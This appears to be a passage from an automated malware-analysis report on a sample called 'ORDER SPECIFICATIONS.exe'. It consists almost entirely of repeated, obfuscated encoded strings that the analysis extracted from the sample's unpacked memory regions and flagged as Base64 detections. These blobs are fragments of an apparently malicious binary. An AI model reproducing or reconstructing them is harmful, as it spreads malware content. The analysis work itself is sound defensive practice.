RDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.csBase64 encoded string: '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
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.csBase64 encoded string: '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